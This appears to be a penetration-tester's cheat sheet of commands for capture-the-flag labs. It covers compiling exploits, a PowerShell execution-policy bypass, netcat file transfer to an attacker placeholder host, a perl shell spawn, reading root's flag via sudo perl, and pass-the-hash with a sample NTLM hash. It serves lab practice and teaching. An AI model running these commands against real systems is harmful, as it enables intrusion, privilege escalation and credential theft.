# MISC

Compiling Exploits

```
gcc -o exploit exploit.c
#Compile C code, add –m32 after ‘gcc’ for compiling 32 bit code on 64 bit Linux
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Cross compiling
Compile Windows exploit in Linux
i686-w64-mingw32-gcc 18176.c -lws2_32 -o 18176.exe

Compile Python script to executable
wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile exploit.py
```

Packet Inspection

```
tcpdump tcp port 80 -w output.pcap -i eth0

```

Powershell bypass

```
Powershell: powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

```

Window Exploit Suggester

```
 ./windows-exploit-suggester.py -d 2019-07-20-mssb.xls -i system.txt
```

Finding Auxiliary

```
 ls /usr/share/nmap/scripts/ | grep smb | grep vuln

```

Netcat

```
From attacker to target
At target
nc -lvp 6969 > blah.txt
At attacker (method 1)
nc x.x.x.x 6969 < blah.txt
At attacker (method 2)
cat blah.txt | nc x.x.x.x 6969
```

Perl Exploit

```
Perl Exploit
perl —e 'exec "/bin/sh";'
sudo perl -F: -lane 'print $F[0]' /root/root.txt
```

Awk

```
Remove duplicate lines:
awk '!seen[$0]++' file
```

Searchsploit

```
searchsploit --overflow --exact --mirror 21234

 searchsploit --overflow --exact Gwolle
```

Firewall Rule Enable

```
firewall rule enable
ufw allow from victimip to any port 80,443 proto tcp

```

Wordlist Creation

```
Wordlist creation:
cewl -w cewl-forum.txt -e -a http://forum.bart.htb
```

PASS the HASH

```

Pass the hash :
pth-winexe -U jenkins/administrator //ip cmd.exe
pth-winexe -U jenkins/administrator%password //ip cmd.exe
crackmapexec

 pth-winexe --user=jeeves/administrator%aad3b435b51404e eaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe

```

Share folder Windows to linux

mount -t fuse.vmhgfs-fuse .host:/ /mnt/hgfs -o allow\_other